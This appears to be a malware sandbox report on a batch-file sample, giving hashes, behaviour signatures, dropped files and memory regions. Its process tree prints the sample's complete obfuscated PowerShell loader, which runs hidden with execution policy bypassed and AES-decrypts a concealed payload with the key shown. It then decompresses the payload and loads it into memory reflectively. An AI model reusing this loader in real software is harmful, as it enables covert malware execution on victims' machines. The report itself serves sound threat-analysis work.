Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    0s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    08/01/2024, 20:50

General

  • Target

    310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat

  • Size

    1.6MB

  • MD5

    4fbb5e9e5b5690f1b361f9f67d10e25c

  • SHA1

    b77eeb5b8b08f5dfa427cd078423e4f190a28c41

  • SHA256

    310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3

  • SHA512

    640cac38739d0d0d1ad8f8dac89b444197ce3778d9eebe864e52ff4902f752c0a3971591f787cc67ecadd538cd2668409423403b2fef2928cfcd837b5b98c770

  • SSDEEP

    24576:qK9lTH+TerznENh/hOe4/Vty848E2CYMjGUdaDJG8wxspPFZ4SAIXnp:Ld+TAnEzZpgP48NmzUWM

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2248
    • C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe
      "310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_EpMhA = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat').Split([Environment]::NewLine);foreach ($_CASH_XmsgQ in $_CASH_EpMhA) { if ($_CASH_XmsgQ.StartsWith(':: @')) { $_CASH_ZQHrQ = $_CASH_XmsgQ.Substring(4); break; }; };$_CASH_ZQHrQ = [System.Text.RegularExpressions.Regex]::Replace($_CASH_ZQHrQ, '_CASH_', '');$_CASH_SYRjr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_ZQHrQ);$_CASH_PvKMs = New-Object System.Security.Cryptography.AesManaged;$_CASH_PvKMs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_PvKMs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_PvKMs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6hNp6znpdVtLRa88u+RJyOIAqy0yV+kZzUW8J2gDR2A=');$_CASH_PvKMs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yDzuGGfzy2kiH4wwo0D5Gg==');$_CASH_GbaEH = $_CASH_PvKMs.CreateDecryptor();$_CASH_SYRjr = $_CASH_GbaEH.TransformFinalBlock($_CASH_SYRjr, 0, $_CASH_SYRjr.Length);$_CASH_GbaEH.Dispose();$_CASH_PvKMs.Dispose();$_CASH_NifoM = New-Object System.IO.MemoryStream(, $_CASH_SYRjr);$_CASH_AvJfW = New-Object System.IO.MemoryStream;$_CASH_wZAxN = New-Object System.IO.Compression.GZipStream($_CASH_NifoM, [IO.Compression.CompressionMode]::Decompress);$_CASH_wZAxN.CopyTo($_CASH_AvJfW);$_CASH_wZAxN.Dispose();$_CASH_NifoM.Dispose();$_CASH_AvJfW.Dispose();$_CASH_SYRjr = $_CASH_AvJfW.ToArray();$_CASH_VbXeh = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_SYRjr);$_CASH_eGoft = $_CASH_VbXeh.EntryPoint;$_CASH_eGoft.Invoke($null, (, [string[]] ('')))
      2⤵
      • Executes dropped EXE
      PID:3032

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe

    Filesize

    7KB

    MD5

    1a55940ea67fa5fc262a46a272504c58

    SHA1

    6f000a45239b343de83ce80f9a3ad0970e9ca010

    SHA256

    0f92483bb3e37523ffb9dd2e62e43974306b66d21ddf9b70c4e8c98f93746e91

    SHA512

    b30f6327104ad5e65f6f6d8b3ac41b927a60a550feb7b8815a6dbc8b46cc2b99519a06f3ba78a9460be8d7ade82b1cde0c3a7e41d2deee91fc6175fc9f7ad639

  • \Users\Admin\AppData\Local\Temp\310b3a077e02c52674f6863a1d7beeb34cfef1b115f0a9e048cb1e8fe7cfcbb3.bat.exe

    Filesize

    18KB

    MD5

    055e9ad68a7ed922ac8b376c96270622

    SHA1

    bf15d9df06764e9045c65f7136c9b1dbae9e36c4

    SHA256

    57f286509d4a5a66f9d77d54360e6caa39241af533b51f731f7285274877b95a

    SHA512

    841613348027c97221d975f3d62a31ced41ebc96333eee2cefed8c00704975418ef739aeeec9762290236de48f0226ef03a43d3af4e2c4e561fc703684423435

  • memory/3032-7-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

    Filesize

    9.6MB

  • memory/3032-9-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

    Filesize

    9.6MB

  • memory/3032-10-0x0000000002AD0000-0x0000000002B50000-memory.dmp

    Filesize

    512KB

  • memory/3032-12-0x0000000002AD0000-0x0000000002B50000-memory.dmp

    Filesize

    512KB

  • memory/3032-11-0x0000000002AD0000-0x0000000002B50000-memory.dmp

    Filesize

    512KB

  • memory/3032-13-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp

    Filesize

    9.6MB

  • memory/3032-8-0x0000000002AD0000-0x0000000002B50000-memory.dmp

    Filesize

    512KB

  • memory/3032-6-0x0000000001D40000-0x0000000001D48000-memory.dmp

    Filesize

    32KB

  • memory/3032-5-0x000000001B330000-0x000000001B612000-memory.dmp

    Filesize

    2.9MB